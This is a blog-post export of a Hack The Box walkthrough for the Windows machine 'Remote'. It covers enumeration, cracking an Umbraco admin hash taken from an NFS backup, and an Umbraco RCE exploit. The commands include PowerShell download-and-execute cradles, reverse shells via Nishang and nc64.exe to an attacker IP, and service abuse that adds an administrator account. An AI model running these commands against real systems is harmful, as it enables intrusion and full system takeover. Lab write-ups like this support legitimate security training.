{"id":1589,"date":"2021-10-07T01:12:20","date_gmt":"2021-10-07T01:12:20","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1589"},"modified":"2021-10-07T01:12:20","modified_gmt":"2021-10-07T01:12:20","slug":"remote","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/10\/07\/remote\/","title":{"rendered":"Remote"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/234\" title=\"Remote\">Remote<\/a> - HTB<\/td>\n<td>Easy<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/8d7c152dc9c28c9556b07dc724c6a37b.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap scan:<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nmap 10.10.10.180 -p- -A -T4 -Pn\nHost discovery disabled (-Pn). All addresses will be marked &#039;up&#039; and scan times will be slower.\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-10-05 18:55 EDT\nStats: 0:01:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 71.43% done; ETC: 18:56 (0:00:07 remaining)\nNmap scan report for 10.10.10.180\nHost is up (0.074s latency).
\nNot shown: 65528 filtered ports\nPORT      STATE SERVICE       VERSION                                                          \n21\/tcp    open  ftp           Microsoft ftpd\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| ftp-syst:           \n|_  SYST: Windows_NT\n80\/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Home - Acme Widgets\n111\/tcp   open  rpcbind       2-4 (RPC #100000) \n| rpcinfo:         \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/tcp6  rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  2,3,4        111\/udp6  rpcbind\n|   100003  2,3         2049\/udp   nfs\n|   100003  2,3         2049\/udp6  nfs                                                                                                                                                        \n|   100003  2,3,4       2049\/tcp   nfs                                                         \n|   100003  2,3,4       2049\/tcp6  nfs\n|   100005  1,2,3       2049\/tcp   mountd\n|   100005  1,2,3       2049\/tcp   mountd                                                                                                                                               [0\/73]\n|   100005  1,2,3       2049\/tcp6  mountd\n|   100005  1,2,3       2049\/udp   mountd\n|   100005  1,2,3       2049\/udp6  mountd\n|   100021  1,2,3,4     2049\/tcp   nlockmgr\n|   100021  1,2,3,4     2049\/tcp6  nlockmgr\n|   100021  1,2,3,4     2049\/udp   nlockmgr\n|   100021  1,2,3,4     2049\/udp6  nlockmgr\n|   100024  1           2049\/tcp   status\n|   100024  1           2049\/tcp6  status\n|   100024  1           2049\/udp   status\n|_  100024  1           2049\/udp6  status\n135\/tcp   open  msrpc         Microsoft Windows RPC\n445\/tcp   open  microsoft-ds?\n2049\/tcp  open  mountd        1-3 (RPC #100005) \n49666\/tcp open  msrpc         Microsoft Windows RPC\nWarning: OSScan 
results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: specialized|general purpose\nRunning (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%)\nOS CPE: cpe:\/o:microsoft:windows_xp::sp3\nAggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2021-10-05T22:57:36\n|_  start_date: N\/A\n\nTRACEROUTE (using port 445\/tcp)\nHOP RTT      ADDRESS\n1   74.57 ms 10.10.14.1\n2   75.16 ms 10.10.10.180\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 233.09 seconds\n<\/code><\/pre>\n<p>Nothing turned up on FTP. After looking at port 80, the only thing I found was that it runs <strong>Umbraco CMS<\/strong>. There are exploits for this CMS on the internet, but we need credentials. So I continued enumerating.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]\n\u2514\u2500# gobuster dir --add-slash --expanded --follow-redirect --url http:\/\/10.10.10.180\/ --no-error -t 50 --wordlist \/usr\/share\/wordlists\/dirb\/big.txt --extensions aspx,html,txt | tee gobuster1\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.180\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              aspx,html,txt\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/10\/05 19:37:40 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.180\/1111\/                
(Status: 200) [Size: 4196]\nhttp:\/\/10.10.10.180\/1111.aspx            (Status: 200) [Size: 4196]\nhttp:\/\/10.10.10.180\/Base\/                (Status: 400) [Size: 11]  \nhttp:\/\/10.10.10.180\/Blog.aspx            (Status: 200) [Size: 5001]\nhttp:\/\/10.10.10.180\/Contact\/             (Status: 200) [Size: 7880]\nhttp:\/\/10.10.10.180\/Blog\/                (Status: 200) [Size: 5001]\nhttp:\/\/10.10.10.180\/Contact.aspx         (Status: 200) [Size: 7880]\nhttp:\/\/10.10.10.180\/Home\/                (Status: 200) [Size: 6703]\nhttp:\/\/10.10.10.180\/Default.aspx         (Status: 200) [Size: 6693]\nhttp:\/\/10.10.10.180\/Home.aspx            (Status: 200) [Size: 6703]\nhttp:\/\/10.10.10.180\/People\/              (Status: 200) [Size: 6749]\nhttp:\/\/10.10.10.180\/Products\/            (Status: 200) [Size: 5338]\nhttp:\/\/10.10.10.180\/People.aspx          (Status: 200) [Size: 6749]\nhttp:\/\/10.10.10.180\/Products.aspx        (Status: 200) [Size: 5338]\nhttp:\/\/10.10.10.180\/about-us\/            (Status: 200) [Size: 5451]\nhttp:\/\/10.10.10.180\/about-us.aspx        (Status: 200) [Size: 5451]\nhttp:\/\/10.10.10.180\/base\/                (Status: 400) [Size: 11]  \nhttp:\/\/10.10.10.180\/blog\/                (Status: 200) [Size: 5011]\nhttp:\/\/10.10.10.180\/blog.aspx            (Status: 200) [Size: 5011]\nhttp:\/\/10.10.10.180\/contact.aspx         (Status: 200) [Size: 7890]\nhttp:\/\/10.10.10.180\/contact\/             (Status: 200) [Size: 7890]\nhttp:\/\/10.10.10.180\/default.aspx         (Status: 200) [Size: 6693]\nhttp:\/\/10.10.10.180\/home\/                (Status: 200) [Size: 6703]\nhttp:\/\/10.10.10.180\/home.aspx            (Status: 200) [Size: 6703]\nhttp:\/\/10.10.10.180\/install\/             (Status: 200) [Size: 4040]\nhttp:\/\/10.10.10.180\/intranet\/            (Status: 200) [Size: 3323]\nhttp:\/\/10.10.10.180\/intranet.aspx        (Status: 200) [Size: 3323]\nhttp:\/\/10.10.10.180\/master\/              (Status: 500) [Size: 
3420]\nhttp:\/\/10.10.10.180\/master.aspx          (Status: 500) [Size: 3420]\nhttp:\/\/10.10.10.180\/people\/              (Status: 200) [Size: 6739]\nhttp:\/\/10.10.10.180\/people.aspx          (Status: 200) [Size: 6739]\nhttp:\/\/10.10.10.180\/person.aspx          (Status: 200) [Size: 2741]\nhttp:\/\/10.10.10.180\/person\/              (Status: 200) [Size: 2741]\nhttp:\/\/10.10.10.180\/product\/             (Status: 500) [Size: 3420]\nhttp:\/\/10.10.10.180\/product.aspx         (Status: 500) [Size: 3420]\nhttp:\/\/10.10.10.180\/products.aspx        (Status: 200) [Size: 5328]\nhttp:\/\/10.10.10.180\/products\/            (Status: 200) [Size: 5328]\nhttp:\/\/10.10.10.180\/umbraco\/             (Status: 200) [Size: 4040]\n\n===============================================================\n2021\/10\/05 19:54:46 Finished\n===============================================================\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                            \n\u2514\u2500# gobuster dir --add-slash --expanded --follow-redirect --url http:\/\/10.10.10.180\/umbraco\/ --no-error -t 50 --wordlist \/usr\/share\/wordlists\/dirb\/big.txt --extensions aspx,html,txt | tee 10\n.10.10.180\/gobuster2                                                                           \n===============================================================            \nGobuster v3.1.0                                                                                \nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)              \n===============================================================            \n[+] Url:                     http:\/\/10.10.10.180\/umbraco\/                  \n[+] Method:                  GET                                                               \n[+] Threads:                 50                                                                \n[+] Wordlist:    
            \/usr\/share\/wordlists\/dirb\/big.txt             \n[+] Negative Status codes:   404                                                               \n[+] User Agent:              gobuster\/3.1.0                                                    \n[+] Extensions:              aspx,html,txt                                                     \n[+] Add Slash:               true                                                              \n[+] Follow Redirect:         true                                                              \n[+] Expanded:                true                                                              \n[+] Timeout:                 10s                                                               \n===============================================================            \n2021\/10\/05 19:38:28 Starting gobuster in directory enumeration mode        \n===============================================================           \nhttp:\/\/10.10.10.180\/umbraco\/Default\/             (Status: 200) [Size: 4040]\nhttp:\/\/10.10.10.180\/umbraco\/Members\/             (Status: 403) [Size: 1233][[3~^[[3~^[[3~\nhttp:\/\/10.10.10.180\/umbraco\/Search\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/actions\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/application\/         (Status: 200) [Size: 2934]\nhttp:\/\/10.10.10.180\/umbraco\/assets\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/config\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/controls\/            (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/create.aspx          (Status: 200) [Size: 657] \nhttp:\/\/10.10.10.180\/umbraco\/create\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/dashboard\/           (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/default\/             (Status: 200) [Size: 
4040]\nhttp:\/\/10.10.10.180\/umbraco\/developer\/           (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/dialogs\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/install\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/js\/                  (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/lib\/                 (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/logout.aspx          (Status: 200) [Size: 657]\nhttp:\/\/10.10.10.180\/umbraco\/masterpages\/         (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/members\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/ping.aspx            (Status: 200) [Size: 12]\nhttp:\/\/10.10.10.180\/umbraco\/plugins\/             (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/preview\/             (Status: 200) [Size: 4040]\nhttp:\/\/10.10.10.180\/umbraco\/search\/              (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/settings\/            (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/translation\/         (Status: 200) [Size: 657]\nhttp:\/\/10.10.10.180\/umbraco\/tree.aspx            (Status: 200) [Size: 657]\nhttp:\/\/10.10.10.180\/umbraco\/views\/               (Status: 403) [Size: 1233]\nhttp:\/\/10.10.10.180\/umbraco\/webservices\/         (Status: 403) [Size: 1233]\n\n===============================================================\n2021\/10\/05 19:55:16 Finished\n===============================================================\n<\/code><\/pre>\n<p>Next I looked at NFS.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# showmount -e 10.10.10.180\nExport list for 10.10.10.180:\n\/site_backups (everyone)<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# mount -t nfs 10.10.10.180:\/site_backups \/mnt\/10.10.10.180
\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cd \/mnt\/10.10.10.180\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# ls\nApp_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config\n<\/code><\/pre>\n<p>I spent a long time looking around inside, but there are far too many files, so we need to narrow things down.<\/p>\n<p>Looking at <a href=\"https:\/\/our.umbraco.com\/forum\/umbraco-7\/using-umbraco-7\/74780-how-do-i-check-what-db-umbraco-is-using\">https:\/\/our.umbraco.com\/forum\/umbraco-7\/using-umbraco-7\/74780-how-do-i-check-what-db-umbraco-is-using<\/a>, I saw that the database details are stored in the config files under the <strong>umbracoDbDSN<\/strong> tag. So I searched for that keyword.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# grep -R &quot;umbracoDbDSN&quot; . | grep -v &#039;Lang&#039;\ngrep: .\/bin\/Umbraco.Core.dll: binary file matches\n.\/Web.config:           &lt;remove name=&quot;umbracoDbDSN&quot; \/&gt;\n.\/Web.config:           &lt;add name=&quot;umbracoDbDSN&quot; connectionString=&quot;Data Source=|DataDirectory|\\Umbraco.sdf;Flush Interval=1;&quot; providerName=&quot;System.Data.SqlServerCe.4.0&quot; \/&gt;\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# find . 
-name &#039;*Umbraco.sdf*&#039; -exec ls -al {} \\; 2&gt;\/dev\/null \n-rwx------ 1 nobody 4294967294 1965978 Feb 20  2020 .\/App_Data\/Umbraco.sdf<\/code><\/pre>\n<p>The file was a binary file.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# file .\/App_Data\/Umbraco.sdf\n.\/App_Data\/Umbraco.sdf: data\n<\/code><\/pre>\n<p>Looking at <a href=\"https:\/\/fileinfo.com\/extension\/sdf\">https:\/\/fileinfo.com\/extension\/sdf<\/a>, I understood that this is a database file and started examining it with strings.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# strings .\/App_Data\/Umbraco.sdf | nl | grep &#039;admin@htb.local&#039; | head\n     4  adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{&quot;hashAlgorithm&quot;:&quot;SHA1&quot;}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50\n     5  adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{&quot;hashAlgorithm&quot;:&quot;SHA1&quot;}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f\n  1109  User &quot;admin&quot; &lt;admin@htb.local&gt;192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/password\/changepassword change\n  1110  User &quot;admin&quot; &lt;admin@htb.local&gt;192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/sign-in\/logoutlogout success\n  1111  User &quot;SYSTEM&quot; 192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate\n  1112  User &quot;SYSTEM&quot; 192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/sign-in\/loginlogin success\n  1113  User &quot;admin&quot; &lt;admin@htb.local&gt;192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/sign-in\/logoutlogout success\n  1114  
User &quot;SYSTEM&quot; 192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate\n  1115  User &quot;SYSTEM&quot; 192.168.195.1User &quot;admin&quot; &lt;admin@htb.local&gt;umbraco\/user\/sign-in\/loginlogin success\n  1116  User &quot;admin&quot; &lt;admin@htb.local&gt;192.168.195.1User &quot;smith&quot; &lt;smith@htb.local&gt;umbraco\/user\/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity\n<\/code><\/pre>\n<p>Great, we found a hash. Next I tried to crack it.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.180]\n\u2514\u2500# john \/root\/10.10.10.180\/hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt --format=Raw-SHA1\nUsing default input encoding: UTF-8\nLoaded 1 password hash (Raw-SHA1 [SHA1 128\/128 AVX 4x])\nWarning: no OpenMP support for this hash type, consider --fork=4\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nbaconandcheese   (admin@htb.local)\n1g 0:00:00:01 DONE (2021-10-06 18:21) 0.8547g\/s 8396Kp\/s 8396Kc\/s 8396KC\/s baconandchipies1..baconandcabbage\nUse the &quot;--show --format=Raw-SHA1&quot; options to display all of the cracked passwords reliably\nSession completed<\/code><\/pre>\n<p>After that I decided to try the exploits I had found.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]\n\u2514\u2500# searchsploit Umbraco CMS\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                     
                                                                                         |  Path                           \n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nUmbraco CMS - Remote Command Execution (Metasploit)                                                                         | windows\/webapps\/19671.rb        \nUmbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                                  | aspx\/webapps\/46153.py           \nUmbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                  | aspx\/webapps\/49488.py           \nUmbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                  | php\/webapps\/44988.txt           \n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results                                                                                                                                        \nPapers: No Results                                                                                                                                            \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]                                                                                                                              \n\u2514\u2500# searchsploit -m aspx\/webapps\/49488.py                                                                                                                     \n  Exploit: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                                         \n      URL: https:\/\/www.exploit-db.com\/exploits\/49488              
\n     Path: \/usr\/share\/exploitdb\/exploits\/aspx\/webapps\/49488.py\nFile Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators\n\nCopied to: \/root\/10.10.10.180\/49488.py\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]\n\u2514\u2500# python3 49488.py -u admin@htb.local -p baconandcheese -i http:\/\/10.10.10.180 -c hostname                                                              2 \u2a2f\nremote\n<\/code><\/pre>\n<p>Great, now we can get a reverse shell.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# wget https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1\nWill not apply HSTS. The HSTS database must be a regular and non-world-writable file.\nERROR: could not open HSTS store at &#039;\/root\/.wget-hsts&#039;. HSTS will be disabled.\n--2021-10-06 19:14:00--  https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 4339 (4.2K) [text\/plain]\nSaving to: \u2018Invoke-PowerShellTcp.ps1\u2019\n\nInvoke-PowerShellTcp.ps1                100%[=============================================================================&gt;]   4.24K  --.-KB\/s    in 0s\n\n2021-10-06 19:14:01 (25.2 MB\/s) - \u2018Invoke-PowerShellTcp.ps1\u2019 saved [4339\/4339]\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# nano Invoke-PowerShellTcp.ps1\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# tail Invoke-PowerShellTcp.ps1\n        }\n    }\n    catch\n    {\n        Write-Warning &quot;Something went wrong! Check if the server is reachable and you are using the correct port.&quot;\n        Write-Error $_\n    }\n}\n\nInvoke-PowerShellTcp -Reverse -IPAddress 10.10.14.21 -Port 443<\/code><\/pre>\n<p>I edited the Invoke-PowerShellTcp file and got a reverse shell.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.180]\n\u2514\u2500# python3 49488.py -u admin@htb.local -p baconandcheese -i http:\/\/10.10.10.180 -c &#039;powershell.exe&#039; -a &quot;iex ((New-Object Net.WebClient).DownloadString(&#039;http:\/\/10.10.14.21\/Invoke-PowerShellTcp.ps1&#039;));&quot;\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nc -lvp 443\nlistening on [any] 443 ...\n10.10.10.180: inverse host lookup failed: Unknown host\nconnect to [10.10.14.21] from (UNKNOWN) [10.10.10.180] 49694\nWindows PowerShell running as user REMOTE$ on REMOTE\nCopyright (C) 2015 Microsoft Corporation. 
All rights reserved.\n\nPS C:\\windows\\system32\\inetsrv&gt;whoami\niis apppool\\defaultapppool\nPS C:\\windows\\system32\\inetsrv&gt; cd C:\/Users\nPS C:\\Users&gt; dir\n\n    Directory: C:\\Users\n\nMode                LastWriteTime         Length Name                                                                  \n----                -------------         ------ ----                                                                  \nd-----        2\/19\/2020   3:12 PM                .NET v2.0                                                             \nd-----        2\/19\/2020   3:12 PM                .NET v2.0 Classic                                                     \nd-----        2\/19\/2020   3:12 PM                .NET v4.5                                                             \nd-----        2\/19\/2020   3:12 PM                .NET v4.5 Classic                                                     \nd-----         7\/9\/2021   6:50 AM                Administrator                                                         \nd-----        2\/19\/2020   3:12 PM                Classic .NET AppPool                                                  \nd-r---        2\/20\/2020   2:42 AM                Public                                                                \n\nPS C:\\Users&gt; cd Public\nPS C:\\Users\\Public&gt; dir\n\n    Directory: C:\\Users\\Public\n\nMode                LastWriteTime         Length Name                                                                  \n----                -------------         ------ ----                                                                  \nd-r---        2\/19\/2020   3:03 PM                Documents                                                             \nd-r---        9\/15\/2018   3:19 AM                Downloads                                                             \nd-r---        9\/15\/2018   3:19 AM                Music                                                     
\nd-r---        9\/15\/2018   3:19 AM                Pictures\nd-r---        9\/15\/2018   3:19 AM                Videos\n-ar---        10\/6\/2021   5:53 PM             34 user.txt\n\nPS C:\\Users\\Public&gt; cat user.txt\nb44487ceb09f1a33d682e163f098182f<\/code><\/pre>\n<p>I performed an AMSI bypass and started downloading my scripts for privilege escalation.<\/p>\n<pre><code class=\"language-sh\">\nPS C:\\Users\\Public&gt; iex ((New-Object Net.WebClient).DownloadString(&#039;http:\/\/10.10.14.21\/PowerUp.ps1&#039;));\nPS C:\\Users\\Public&gt; Invoke-AllChecks\n\nPrivilege   : SeImpersonatePrivilege\nAttributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\nTokenHandle : 2452\nProcessId   : 3040\nName        : 3040\nCheck       : Process Token Privileges\n\nServiceName   : UsoSvc\nPath          : C:\\Windows\\system32\\svchost.exe -k netsvcs -p\nStartName     : LocalSystem\nAbuseFunction : Invoke-ServiceAbuse -Name &#039;UsoSvc&#039;\nCanRestart    : True\nName          : UsoSvc\nCheck         : Modifiable Services\n\nUnattendPath : C:\\Windows\\Panther\\Unattend.xml\nName         : C:\\Windows\\Panther\\Unattend.xml\nCheck        : Unattended Install Files\n\nPS C:\\Users\\Public&gt; Get-ChildItem : Access to the path &#039;C:\\ProgramData\\USOPrivate&#039; is denied.\nAt line:4516 char:21\n+ ... 
$XMlFiles = Get-ChildItem -Path $AllUsers -Recurse -Include &#039;Groups.x ...\n+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : PermissionDenied: (C:\\ProgramData\\USOPrivate:String) [Get-ChildItem], UnauthorizedAccess \n   Exception\n    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\n<\/code><\/pre>\n<p>Our job looks easy and fun. We will carry out an unquoted path attack. Let's give it a try.<\/p>\n<pre><code class=\"language-sh\">\nPS C:\\Users\\Public&gt; Invoke-ServiceAbuse -Name &#039;UsoSvc&#039;\n\nServiceAbused Command\n------------- -------\nUsoSvc        net user john Password123! \/add &amp;&amp; net localgroup Administrators john \/add  <\/code><\/pre>\n<pre><code class=\"language-sh\">\nPS C:\\Users\\Public&gt; net localgroup Administrators\nAlias name     Administrators\nComment        Administrators have complete and unrestricted access to the computer\/domain\n\nMembers\n\n-------------------------------------------------------------------------------\nAdministrator\njohn\nThe command completed successfully.<\/code><\/pre>\n<p>I want to drop nc.exe onto the box and try to get a reverse shell. For that, I checked whether the machine is 32- or 64-bit.<\/p>\n<pre><code class=\"language-sh\">\nPS C:\\Users\\Public&gt; [System.Environment]::Is64BitOperatingSystem\nTrue\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\nPS C:\\Windows\\Temp&gt;\nPS C:\\Windows\\Temp&gt; Invoke-WebRequest -Uri &quot;http:\/\/10.10.14.21\/nc64.exe&quot; -OutFile &quot;C:\\Windows\\Temp\\nc64.exe&quot; <\/code><\/pre>\n<pre><code class=\"language-sh\">\nPS C:\\Windows\\Temp&gt;  Invoke-ServiceAbuse -Name UsoSvc -Command &quot;C:\\Windows\\Temp\\nc64.exe 10.10.14.21 4444 -e cmd.exe&quot;<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt\/PowerSploit\/Privesc]\n\u2514\u2500# nc -lvp 4444                                                           1 \u2a2f\nlistening on [any] 4444 ...\n10.10.10.180: inverse host lookup failed: Unknown host\nconnect to [10.10.14.21] from (UNKNOWN) [10.10.10.180] 49692\nMicrosoft Windows [Version 10.0.17763.107]\n(c) 2018 Microsoft Corporation. 
All rights reserved.\n\nC:\\Windows\\system32&gt;whoami\nwhoami\nnt authority\\system\n\nC:\\Windows\\system32&gt;cd C:\\Users\\Administrator\ncd C:\\Users\\Administrator\n\nC:\\Users\\Administrator&gt;ls\nls\n&#039;ls&#039; is not recognized as an internal or external command,\noperable program or batch file.\n\nC:\\Users\\Administrator&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is D582-9880\n\n Directory of C:\\Users\\Administrator\n\n07\/09\/2021  06:50 AM    &lt;DIR&gt;          .\n07\/09\/2021  06:50 AM    &lt;DIR&gt;          ..\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          3D Objects\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Contacts\n02\/20\/2020  03:41 AM    &lt;DIR&gt;          Desktop\n02\/19\/2020  05:26 PM    &lt;DIR&gt;          Documents\n02\/23\/2020  02:22 PM    &lt;DIR&gt;          Downloads\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Favorites\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Links\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Music\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Pictures\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Saved Games\n02\/20\/2020  01:45 AM    &lt;DIR&gt;          Searches\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Videos\n               0 File(s)              0 bytes\n              14 Dir(s)  13,410,852,864 bytes free\n\nC:\\Users\\Administrator&gt;cd Desktop\ncd Desktop\n\nC:\\Users\\Administrator\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is D582-9880\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n02\/20\/2020  03:41 AM    &lt;DIR&gt;          .\n02\/20\/2020  03:41 AM    &lt;DIR&gt;          ..\n10\/06\/2021  08:11 PM                34 root.txt\n               1 File(s)             34 bytes\n               2 Dir(s)  13,410,656,256 bytes free\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\n6d2275070481c4ed17c8dc4ede319c6e\n\nC:\\Users\\Administrator\\Desktop&gt;\n<\/code><\/pre>\n<p>One of the most enjoyable machines I have solved recently!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Level OS Logo Remote &#8211; HTB Easy Windows Walkthrough nmap scan: \u250c\u2500\u2500(root&#x1f480;kali)-[~] \u2514\u2500# nmap 10.10.10.180 -p- -A -T4 -Pn Host discovery disabled (-Pn).&#8230;<\/p>\n<div 